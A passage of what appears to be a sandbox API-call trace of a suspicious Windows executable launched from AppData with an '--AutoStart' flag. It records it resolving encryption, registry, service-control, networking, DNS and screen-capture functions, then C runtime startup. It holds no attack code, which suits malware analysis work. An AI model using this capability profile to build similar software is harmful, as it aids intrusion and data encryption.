(hModule=0x77010000, lpProcName="SetLastError") returned 0x770211a9 [0175.053] GetProcAddress (hModule=0x77010000, lpProcName="GetProcAddress") returned 0x77021222 [0175.053] GetProcAddress (hModule=0x77010000, lpProcName="VirtualAlloc") returned 0x77021856 [0175.053] GetProcAddress (hModule=0x77010000, lpProcName="MoveFileW") returned 0x77039af0 [0175.053] GetProcAddress (hModule=0x77010000, lpProcName="FindClose") returned 0x77024442 [0175.053] GetProcAddress (hModule=0x77010000, lpProcName="Process32FirstW") returned 0x77048baf [0175.053] GetProcAddress (hModule=0x77010000, lpProcName="LocalAlloc") returned 0x7702168c [0175.053] GetProcAddress (hModule=0x77010000, lpProcName="CreateEventW") returned 0x7702183e [0175.053] GetProcAddress (hModule=0x77010000, lpProcName="GetModuleFileNameA") returned 0x770214b1 [0175.054] GetProcAddress (hModule=0x77010000, lpProcName="Process32NextW") returned 0x7704896c [0175.054] GetProcAddress (hModule=0x77010000, lpProcName="lstrcatW") returned 0x7704828e [0175.054] GetProcAddress (hModule=0x77010000, lpProcName="CreateMutexA") returned 0x77024c6b [0175.054] GetProcAddress (hModule=0x77010000, lpProcName="FindNextFileW") returned 0x770254ee [0175.054] GetProcAddress (hModule=0x77010000, lpProcName="CreateToolhelp32Snapshot") returned 0x7704735f [0175.058] GetProcAddress (hModule=0x77010000, lpProcName="SetEnvironmentVariableA") returned 0x7702e331 [0175.058] GetProcAddress (hModule=0x77010000, lpProcName="DeleteFileW") returned 0x770289b3 [0175.058] GetProcAddress (hModule=0x77010000, lpProcName="LocalFree") returned 0x77022d3c [0175.058] GetProcAddress (hModule=0x77010000, lpProcName="lstrcpyW") returned 0x77043102 [0175.058] GetProcAddress (hModule=0x77010000, lpProcName="DeleteFileA") returned 0x77025444 [0175.059] GetProcAddress (hModule=0x77010000, lpProcName="lstrcpyA") returned 0x77042a9d [0175.059] GetProcAddress (hModule=0x77010000, lpProcName="SetPriorityClass") returned 0x7703cf28 [0175.059] GetProcAddress (hModule=0x77010000, lpProcName="GetCurrentProcess") returned 0x77021809 [0175.059] GetProcAddress (hModule=0x77010000, lpProcName="GetComputerNameW") returned 0x7702dd0e [0175.059] GetProcAddress (hModule=0x77010000, lpProcName="GetLogicalDrives") returned 0x77025371 [0175.059] GetProcAddress (hModule=0x77010000, lpProcName="GetModuleFileNameW") returned 0x77024950 [0175.059] GetProcAddress (hModule=0x77010000, lpProcName="SetStdHandle") returned 0x770a454f [0175.059] GetProcAddress (hModule=0x77010000, lpProcName="GetVersion") returned 0x77024467 [0175.059] GetProcAddress (hModule=0x77010000, lpProcName="CreateDirectoryA") returned 0x7704d526 [0175.060] GetProcAddress (hModule=0x77010000, lpProcName="CreateThread") returned 0x770234d5 [0175.060] GetProcAddress (hModule=0x77010000, lpProcName="CompareStringW") returned 0x77023bca [0175.060] GetProcAddress (hModule=0x77010000, lpProcName="GetTimeFormatW") returned 0x7703f481 [0175.060] GetProcAddress (hModule=0x77010000, lpProcName="GetDateFormatW") returned 0x770434d7 [0175.060] GetProcAddress (hModule=0x77010000, lpProcName="EnumSystemLocalesW") returned 0x770a425f [0175.060] GetProcAddress (hModule=0x77010000, lpProcName="GetUserDefaultLCID") returned 0x77023da5 [0175.060] GetProcAddress (hModule=0x77010000, lpProcName="IsValidLocale") returned 0x7703ce46 [0175.060] GetProcAddress (hModule=0x77010000, lpProcName="GetLocaleInfoW") returned 0x77023c42 [0175.060] GetProcAddress (hModule=0x77010000, lpProcName="CreateSemaphoreW") returned 0x7703ca5a [0175.061] GetProcAddress (hModule=0x77010000, lpProcName="GetModuleHandleW") returned 0x770234b0 [0175.061] GetProcAddress (hModule=0x77010000, lpProcName="GetTickCount") returned 0x7702110c [0175.061] GetProcAddress (hModule=0x77010000, lpProcName="TlsFree") returned 0x77023587 [0175.061] GetProcAddress (hModule=0x77010000, lpProcName="TlsSetValue") returned 0x770214fb [0175.061] GetProcAddress (hModule=0x77010000, lpProcName="TlsGetValue") returned 0x770211e0 [0175.061] GetProcAddress (hModule=0x77010000, lpProcName="TlsAlloc") returned 0x770249ad [0175.061] GetProcAddress (hModule=0x77010000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x77021916 [0175.062] GetProcAddress (hModule=0x77010000, lpProcName="SetUnhandledExceptionFilter") returned 0x770287c9 [0175.062] GetProcAddress (hModule=0x77010000, lpProcName="UnhandledExceptionFilter") returned 0x7704772f [0175.062] GetProcAddress (hModule=0x77010000, lpProcName="GetModuleHandleA") returned 0x77021245 [0175.062] GetProcAddress (hModule=0x77010000, lpProcName="GetVersionExA") returned 0x77023519 [0175.062] GetProcAddress (hModule=0x77010000, lpProcName="GlobalMemoryStatus") returned 0x77028b6d [0175.062] GetProcAddress (hModule=0x77010000, lpProcName="LoadLibraryA") returned 0x770249d7 [0175.062] GetProcAddress (hModule=0x77010000, lpProcName="FlushConsoleInputBuffer") returned 0x770c7a9f [0175.063] GetProcAddress (hModule=0x77010000, lpProcName="WaitForSingleObject") returned 0x77021136 [0175.063] GetProcAddress (hModule=0x77010000, lpProcName="CreateDirectoryW") returned 0x77024259 [0175.063] GetProcAddress (hModule=0x77010000, lpProcName="SetFilePointerEx") returned 0x7703c807 [0175.063] GetProcAddress (hModule=0x77010000, lpProcName="CreateProcessW") returned 0x7702103d [0175.063] GetProcAddress (hModule=0x77010000, lpProcName="FreeLibrary") returned 0x770234c8 [0175.063] GetProcAddress (hModule=0x77010000, lpProcName="SetErrorMode") returned 0x77021b00 [0175.063] GetProcAddress (hModule=0x77010000, lpProcName="lstrlenA") returned 0x77025a4b [0175.063] GetProcAddress (hModule=0x77010000, lpProcName="SetFilePointer") returned 0x770217d1 [0175.064] GetProcAddress (hModule=0x77010000, lpProcName="FindFirstFileW") returned 0x77024435 [0175.064] GetProcAddress (hModule=0x77010000, lpProcName="SetConsoleMode") returned 0x7703a77d [0175.064] GetProcAddress (hModule=0x77010000, lpProcName="CreateFileA") returned 0x770253c6 [0175.064] GetProcAddress (hModule=0x77010000, lpProcName="GetCommandLineW") returned 0x77025223 [0175.064] GetProcAddress (hModule=0x77010000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x770c793f [0175.064] GetProcAddress (hModule=0x77010000, lpProcName="PeekConsoleInputA") returned 0x770c6f0d [0175.065] GetProcAddress (hModule=0x77010000, lpProcName="FreeEnvironmentStringsW") returned 0x770251cb [0175.065] GetProcAddress (hModule=0x77010000, lpProcName="GetEnvironmentStringsW") returned 0x770251e3 [0175.065] GetProcAddress (hModule=0x77010000, lpProcName="GetCurrentProcessId") returned 0x770211f8 [0175.065] GetProcAddress (hModule=0x77010000, lpProcName="QueryPerformanceCounter") returned 0x77021725 [0175.065] GetProcAddress (hModule=0x77010000, lpProcName="GetTimeZoneInformation") returned 0x7702465a [0175.066] GetProcAddress (hModule=0x77010000, lpProcName="RaiseException") returned 0x770258a6 [0175.066] GetProcAddress (hModule=0x77010000, lpProcName="GetStringTypeW") returned 0x77021946 [0175.066] GetProcAddress (hModule=0x77010000, lpProcName="GetConsoleCP") returned 0x770c7bff [0175.066] GetProcAddress (hModule=0x77010000, lpProcName="ReadConsoleW") returned 0x770c739a [0175.066] GetProcAddress (hModule=0x77010000, lpProcName="GetConsoleMode") returned 0x77021328 [0175.066] GetProcAddress (hModule=0x77010000, lpProcName="HeapSize") returned 0x77603002 [0175.066] GetProcAddress (hModule=0x77010000, lpProcName="LoadLibraryExW") returned 0x7702495d [0175.066] GetProcAddress (hModule=0x77010000, lpProcName="OutputDebugStringW") returned 0x7704d1d4 [0175.067] GetProcAddress (hModule=0x77010000, lpProcName="SetConsoleCtrlHandler") returned 0x77028a09 [0175.067] GetProcAddress (hModule=0x77010000, lpProcName="RtlUnwind") returned 0x7704d1c3 [0175.067] GetProcAddress (hModule=0x77010000, lpProcName="FatalAppExitA") returned 0x770a4691 [0175.067] GetProcAddress (hModule=0x77010000, lpProcName="GetStartupInfoW") returned 0x77024d40 [0175.067] GetProcAddress (hModule=0x77010000, lpProcName="GetExitCodeProcess") returned 0x7703174d [0175.067] GetProcAddress (hModule=0x77010000, lpProcName="LCMapStringW") returned 0x770217b9 [0175.067] GetProcAddress (hModule=0x77010000, lpProcName="DeleteCriticalSection") returned 0x776045f5 [0175.068] GetProcAddress (hModule=0x77010000, lpProcName="AreFileApisANSI") returned 0x770a40d1 [0175.068] GetProcAddress (hModule=0x77010000, lpProcName="ExitProcess") returned 0x77027a10 [0175.068] GetProcAddress (hModule=0x77010000, lpProcName="GetProcessHeap") returned 0x770214e9 [0175.068] GetProcAddress (hModule=0x77010000, lpProcName="HeapReAlloc") returned 0x77611f6e [0175.068] GetProcAddress (hModule=0x77010000, lpProcName="GlobalFree") returned 0x77025558 [0175.068] GetProcAddress (hModule=0x77010000, lpProcName="SetEndOfFile") returned 0x7703ce2e [0175.068] GetProcAddress (hModule=0x77010000, lpProcName="ReadConsoleInputA") returned 0x770c6f53 [0175.069] GetProcAddress (hModule=0x77010000, lpProcName="CloseHandle") returned 0x77021410 [0175.069] GetProcAddress (hModule=0x77010000, lpProcName="HeapFree") returned 0x770214c9 [0175.069] GetProcAddress (hModule=0x77010000, lpProcName="HeapAlloc") returned 0x775fe026 [0175.069] GetProcAddress (hModule=0x77010000, lpProcName="EnterCriticalSection") returned 0x775f22b0 [0175.069] GetProcAddress (hModule=0x77010000, lpProcName="LeaveCriticalSection") returned 0x775f2270 [0175.069] GetProcAddress (hModule=0x77010000, lpProcName="GetStdHandle") returned 0x770251b3 [0175.069] GetProcAddress (hModule=0x77010000, lpProcName="GetFileType") returned 0x77023531 [0175.069] GetProcAddress (hModule=0x77010000, lpProcName="GetModuleHandleExW") returned 0x77024a6f [0175.069] GetProcAddress (hModule=0x77010000, lpProcName="WriteConsoleW") returned 0x77047aca [0175.069] GetProcAddress (hModule=0x77010000, lpProcName="EncodePointer") returned 0x77610fcb [0175.070] GetProcAddress (hModule=0x77010000, lpProcName="DecodePointer") returned 0x77609d35 [0175.070] GetProcAddress (hModule=0x77010000, lpProcName="GetSystemTimeAsFileTime") returned 0x77023509 [0175.070] GetProcAddress (hModule=0x77010000, lpProcName="IsDebuggerPresent") returned 0x77024a5d [0175.070] GetProcAddress (hModule=0x77010000, lpProcName="IsProcessorFeaturePresent") returned 0x77025235 [0175.070] GetProcAddress (hModule=0x77010000, lpProcName="IsValidCodePage") returned 0x77024493 [0175.070] GetProcAddress (hModule=0x77010000, lpProcName="GetACP") returned 0x7702179c [0175.070] GetProcAddress (hModule=0x77010000, lpProcName="GetOEMCP") returned 0x7704d1a1 [0175.071] GetProcAddress (hModule=0x77010000, lpProcName="GetCPInfo") returned 0x77025189 [0175.071] GetProcAddress (hModule=0x77010000, lpProcName="GetCurrentThread") returned 0x770217ec [0175.071] GetProcAddress (hModule=0x77010000, lpProcName="GetCurrentThreadId") returned 0x77021450 [0175.071] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76c80000 [0175.071] GetProcAddress (hModule=0x76c80000, lpProcName="PeekMessageW") returned 0x76ca05ba [0175.071] GetProcAddress (hModule=0x76c80000, lpProcName="PostThreadMessageW") returned 0x76c98bff [0175.071] GetProcAddress (hModule=0x76c80000, lpProcName="DefWindowProcW") returned 0x776025dd [0175.071] GetProcAddress (hModule=0x76c80000, lpProcName="DispatchMessageW") returned 0x76c9787b [0175.071] GetProcAddress (hModule=0x76c80000, lpProcName="UpdateWindow") returned 0x76ca3559 [0175.072] GetProcAddress (hModule=0x76c80000, lpProcName="CreateWindowExW") returned 0x76c98a29 [0175.072] GetProcAddress (hModule=0x76c80000, lpProcName="LoadCursorW") returned 0x76c988f7 [0175.072] GetProcAddress (hModule=0x76c80000, lpProcName="IsWindow") returned 0x76c97136 [0175.072] GetProcAddress (hModule=0x76c80000, lpProcName="ShowWindow") returned 0x76ca0dfb [0175.072] GetProcAddress (hModule=0x76c80000, lpProcName="RegisterClassExW") returned 0x76c9b17d [0175.072] GetProcAddress (hModule=0x76c80000, lpProcName="PostQuitMessage") returned 0x76c99abb [0175.072] GetProcAddress (hModule=0x76c80000, lpProcName="GetMessageW") returned 0x76c978e2 [0175.073] GetProcAddress (hModule=0x76c80000, lpProcName="DestroyWindow") returned 0x76c99a55 [0175.073] GetProcAddress (hModule=0x76c80000, lpProcName="SendMessageW") returned 0x76c99679 [0175.073] GetProcAddress (hModule=0x76c80000, lpProcName="GetProcessWindowStation") returned 0x76c99eea [0175.073] GetProcAddress (hModule=0x76c80000, lpProcName="GetUserObjectInformationW") returned 0x76c98068 [0175.073] GetProcAddress (hModule=0x76c80000, lpProcName="MessageBoxA") returned 0x76cefd1e [0175.073] GetProcAddress (hModule=0x76c80000, lpProcName="GetDesktopWindow") returned 0x76ca0a19 [0175.073] GetProcAddress (hModule=0x76c80000, lpProcName="MessageBoxW") returned 0x76cefd3f [0175.073] GetProcAddress (hModule=0x76c80000, lpProcName="TranslateMessage") returned 0x76c97809 [0175.073] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x764d0000 [0175.074] GetProcAddress (hModule=0x764d0000, lpProcName="RegCloseKey") returned 0x764e469d [0175.074] GetProcAddress (hModule=0x764d0000, lpProcName="CloseServiceHandle") returned 0x764e369c [0175.074] GetProcAddress (hModule=0x764d0000, lpProcName="GetUserNameW") returned 0x764e157a [0175.074] GetProcAddress (hModule=0x764d0000, lpProcName="ReportEventA") returned 0x764d3ee9 [0175.074] GetProcAddress (hModule=0x764d0000, lpProcName="RegisterEventSourceA") returned 0x764e2d46 [0175.074] GetProcAddress (hModule=0x764d0000, lpProcName="DeregisterEventSource") returned 0x764e35dd [0175.075] GetProcAddress (hModule=0x764d0000, lpProcName="CryptHashData") returned 0x764ddf36 [0175.075] GetProcAddress (hModule=0x764d0000, lpProcName="RegSetValueExW") returned 0x764e14d6 [0175.075] GetProcAddress (hModule=0x764d0000, lpProcName="CryptDestroyHash") returned 0x764ddf66 [0175.076] GetProcAddress (hModule=0x764d0000, lpProcName="ControlService") returned 0x764f7144 [0175.076] GetProcAddress (hModule=0x764d0000, lpProcName="RegOpenKeyExW") returned 0x764e468d [0175.076] GetProcAddress (hModule=0x764d0000, lpProcName="CryptCreateHash") returned 0x764ddf4e [0175.076] GetProcAddress (hModule=0x764d0000, lpProcName="CryptEncrypt") returned 0x764f779b [0175.076] GetProcAddress (hModule=0x764d0000, lpProcName="CryptImportKey") returned 0x764dc532 [0175.076] GetProcAddress (hModule=0x764d0000, lpProcName="QueryServiceStatus") returned 0x764e2a86 [0175.076] GetProcAddress (hModule=0x764d0000, lpProcName="RegQueryValueExW") returned 0x764e46ad [0175.076] GetProcAddress (hModule=0x764d0000, lpProcName="CryptReleaseContext") returned 0x764de124 [0175.076] GetProcAddress (hModule=0x764d0000, lpProcName="OpenServiceW") returned 0x764dca4c [0175.077] GetProcAddress (hModule=0x764d0000, lpProcName="OpenSCManagerW") returned 0x764dca64 [0175.077] GetProcAddress (hModule=0x764d0000, lpProcName="CryptAcquireContextW") returned 0x764ddf14 [0175.077] GetProcAddress (hModule=0x764d0000, lpProcName="CryptGetHashParam") returned 0x764ddf7e [0175.077] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75330000 [0175.081] GetProcAddress (hModule=0x75330000, lpProcName="SHGetPathFromIDListW") returned 0x753c17bf [0175.082] GetProcAddress (hModule=0x75330000, lpProcName="SHGetSpecialFolderLocation") returned 0x753be141 [0175.082] GetProcAddress (hModule=0x75330000, lpProcName="ShellExecuteA") returned 0x75577078 [0175.082] GetProcAddress (hModule=0x75330000, lpProcName="ShellExecuteExW") returned 0x75351e46 [0175.082] GetProcAddress (hModule=0x75330000, lpProcName="CommandLineToArgvW") returned 0x75349ee8 [0175.082] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathA") returned 0x75447804 [0175.083] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x766f0000 [0175.083] GetProcAddress (hModule=0x766f0000, lpProcName="CoInitialize") returned 0x7670b636 [0175.083] GetProcAddress (hModule=0x766f0000, lpProcName="CoInitializeSecurity") returned 0x76717259 [0175.083] GetProcAddress (hModule=0x766f0000, lpProcName="CoUninitialize") returned 0x767386d3 [0175.083] GetProcAddress (hModule=0x766f0000, lpProcName="CoCreateInstance") returned 0x76739d0b [0175.084] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76d80000 [0175.084] GetProcAddress (hModule=0x76d80000, lpProcName=0x6) returned 0x76d83e59 [0175.084] GetProcAddress (hModule=0x76d80000, lpProcName=0x8) returned 0x76d83ed5 [0175.085] GetProcAddress (hModule=0x76d80000, lpProcName=0x9) returned 0x76d83eae [0175.085] GetProcAddress (hModule=0x76d80000, lpProcName=0xc8) returned 0x76d83f21 [0175.085] GetProcAddress (hModule=0x76d80000, lpProcName=0xca) returned 0x76d8fd6b [0175.085] GetProcAddress (hModule=0x76d80000, lpProcName=0xc9) returned 0x76d84af8 [0175.085] GetProcAddress (hModule=0x76d80000, lpProcName=0xc) returned 0x76d85dee [0175.085] GetProcAddress (hModule=0x76d80000, lpProcName=0x2) returned 0x76d84642 [0175.085] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75090000 [0176.737] GetProcAddress (hModule=0x75090000, lpProcName="GetAdaptersInfo") returned 0x75099263 [0176.738] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x752f0000 [0176.785] GetProcAddress (hModule=0x752f0000, lpProcName=0xc) returned 0x752fb131 [0176.785] GetProcAddress (hModule=0x752f0000, lpProcName=0xb) returned 0x752f311b [0176.785] GetProcAddress (hModule=0x752f0000, lpProcName=0x34) returned 0x75307673 [0176.785] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x75020000 [0177.203] GetProcAddress (hModule=0x75020000, lpProcName="DnsFree") returned 0x7502436b [0177.204] GetProcAddress (hModule=0x75020000, lpProcName="DnsQuery_W") returned 0x7503572c [0177.204] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x76040000 [0177.204] GetProcAddress (hModule=0x76040000, lpProcName="CryptStringToBinaryA") returned 0x76075d77 [0177.204] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76660000 [0177.204] GetProcAddress (hModule=0x76660000, lpProcName="DeleteObject") returned 0x76675689 [0177.204] GetProcAddress (hModule=0x76660000, lpProcName="GetObjectA") returned 0x766785d4 [0177.204] GetProcAddress (hModule=0x76660000, lpProcName="SelectObject") returned 0x76674f70 [0177.205] GetProcAddress (hModule=0x76660000, lpProcName="GetDeviceCaps") returned 0x76674de0 [0177.205] GetProcAddress (hModule=0x76660000, lpProcName="GetBitmapBits") returned 0x7667c155 [0177.205] GetProcAddress (hModule=0x76660000, lpProcName="BitBlt") returned 0x76675ea6 [0177.205] GetProcAddress (hModule=0x76660000, lpProcName="DeleteDC") returned 0x766758b3 [0177.205] GetProcAddress (hModule=0x76660000, lpProcName="CreateDCA") returned 0x76677bcc [0177.205] GetProcAddress (hModule=0x76660000, lpProcName="CreateCompatibleDC") returned 0x766754f4 [0177.206] GetProcAddress (hModule=0x76660000, lpProcName="CreateCompatibleBitmap") returned 0x76675f49 [0177.206] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x74f60000 [0178.489] GetProcAddress (hModule=0x74f60000, lpProcName="atexit") returned 0x74f7c544 [0178.489] atexit (param_1=0x720920) returned 0 [0178.498] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f498 | out: lpSystemTimeAsFileTime=0x18f498*(dwLowDateTime=0xdaf76df0, dwHighDateTime=0x1d5d833)) [0178.498] GetCurrentThreadId () returned 0x540 [0178.498] GetCurrentProcessId () returned 0x53c [0178.498] QueryPerformanceCounter (in: lpPerformanceCount=0x18f490 | out: lpPerformanceCount=0x18f490*=8672289708) returned 1 [0178.873] GetStartupInfoW (in: lpStartupInfo=0x18f428 | out: lpStartupInfo=0x18f428*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x77023519, hStdOutput=0x775efd35, hStdError=0x77657daf)) [0179.201] GetProcessHeap () returned 0x620000 [0179.375] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77010000 [0179.376] GetProcAddress (hModule=0x77010000, lpProcName="FlsAlloc") returned 0x77024f2b [0179.376] GetProcAddress (hModule=0x77010000, lpProcName="FlsFree") returned 0x7702359f [0179.376] GetProcAddress (hModule=0x77010000, lpProcName="FlsGetValue") returned 0x77021252 [0179.376] GetProcAddress (hModule=0x77010000, lpProcName="FlsSetValue") returned 0x77024208 [0179.376] GetProcAddress (hModule=0x77010000, lpProcName="InitializeCriticalSectionEx") returned 0x77024d28 [0179.376] GetProcAddress (hModule=0x77010000, lpProcName="CreateEventExW") returned 0x770a410b [0179.376] GetProcAddress (hModule=0x77010000, lpProcName="CreateSemaphoreExW") returned 0x770a4195 [0179.377] GetProcAddress (hModule=0x77010000, lpProcName="SetThreadStackGuarantee") returned 0x7702d31f [0179.493] GetProcAddress (hModule=0x77010000, lpProcName="CreateThreadpoolTimer") returned 0x7703ee7e [0179.493] GetProcAddress (hModule=0x77010000, lpProcName="SetThreadpoolTimer") returned 0x7761441c [0179.494] GetProcAddress (hModule=0x77010000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7763c50e [0179.494] GetProcAddress (hModule=0x77010000, lpProcName="CloseThreadpoolTimer") returned 0x7763c381 [0179.494] GetProcAddress (hModule=0x77010000, lpProcName="CreateThreadpoolWait") returned 0x7703f088 [0179.494] GetProcAddress (hModule=0x77010000, lpProcName="SetThreadpoolWait") returned 0x776205d7 [0179.494] GetProcAddress (hModule=0x77010000, lpProcName="CloseThreadpoolWait") returned 0x7763ca24 [0179.494] GetProcAddress (hModule=0x77010000, lpProcName="FlushProcessWriteBuffers") returned 0x775f0b8c [0179.494] GetProcAddress (hModule=0x77010000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x776afde8 [0179.494] GetProcAddress (hModule=0x77010000, lpProcName="GetCurrentProcessorNumber") returned 0x77641e1d [0179.495] GetProcAddress (hModule=0x77010000, lpProcName="GetLogicalProcessorInformation") returned 0x770a4761 [0179.495] GetProcAddress (hModule=0x77010000, lpProcName="CreateSymbolicLinkW") returned 0x7709cd11 [0179.495] GetProcAddress (hModule=0x77010000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0179.495] GetProcAddress (hModule=0x77010000, lpProcName="EnumSystemLocalesEx") returned 0x770a424f [0179.496] GetProcAddress (hModule=0x77010000, lpProcName="CompareStringEx") returned 0x770a46b1 [0179.496] GetProcAddress (hModule=0x77010000, lpProcName="GetDateFormatEx") returned 0x770b6676 [0179.496] GetProcAddress (hModule=0x77010000, lpProcName="GetLocaleInfoEx") returned 0x770a4751 [0179.496] GetProcAddress (hModule=0x77010000, lpProcName="GetTimeFormatEx") returned 0x770b65f1 [0179.496] GetProcAddress (hModule=0x77010000, lpProcName="GetUserDefaultLocaleName") returned 0x770a47c1 [0179.496] GetProcAddress (hModule=0x77010000, lpProcName="IsValidLocaleName") returned 0x770a47e1 [0179.496] GetProcAddress (hModule=0x77010000, lpProcName="LCMapStringEx") returned 0x770a47f1 [0179.496] GetProcAddress (hModule=0x77010000, lpProcName="GetCurrentPackageId") returned 0x0 [0179.496] GetProcAddress (hModule=0x77010000, lpProcName="GetTickCount64") returned 0x7703eee0 [0179.497] GetProcAddress (hModule=0x77010000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0179.497] GetProcAddress (hModule=0x77010000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0179.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3bc) returned 0x63f0e0 [0179.515] GetCurrentThreadId () returned 0x540 [0179.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x623730 [0179.537] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x800) returned 0x63f4a8 [0179.537] GetStartupInfoW (in: lpStartupInfo=0x18f3f8 | out: lpStartupInfo=0x18f3f8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xdfca16ed, hStdError=0x44)) [0179.537] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0179.537] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0179.537] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0179.537] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe\" --AutoStart" [0179.538] GetEnvironmentStringsW () returned 0x63fcb0* [0179.752] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb02) returned 0x6407c0 [0179.763] FreeEnvironmentStringsW (penv=0x63fcb0) returned 1 [0179.774] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\ythgrfed.exe.exe")) returned 0x61 [0179.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xe8) returned 0x63fcb0 [0179.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x9c) returned 0x63fda0 [0179.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3e) returned 0x635490 [0179.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x6c) returned 0x63fe48 [0179.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x6e) returned 0x63fec0 [0179.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x78) returned 0x631728 [0179.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x62) returned 0x63ff38 [0179.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x63add0 [0179.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x636990 [0179.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x28) returned 0x63a7f8 [0179.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1a) returned 0x63ec40 [0179.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x4a) returned 0x63ffa8 [0179.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x72) returned 0x6317a8 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x63ae08 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x63ae40 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1c) returned 0x63ec68 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xd2) returned 0x640000 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x7c) returned 0x6400e0 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x640168 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3a) returned 0x6354d8 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x90) returned 0x6401a8 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x24) returned 0x63a828 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x30) returned 0x63ae78 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x36) returned 0x640240 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x48) returned 0x6369e0 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x52) returned 0x640280 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x3c) returned 0x635520 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x82) returned 0x6402e0 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2e) returned 0x63aeb0 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x28) returned 0x63a858 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1e) returned 0x63ec90 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2c) returned 0x63aee8 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x54) returned 0x640370 [0179.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x52) returned 0x6403d0 [0179.835] RtlAllocateHeap 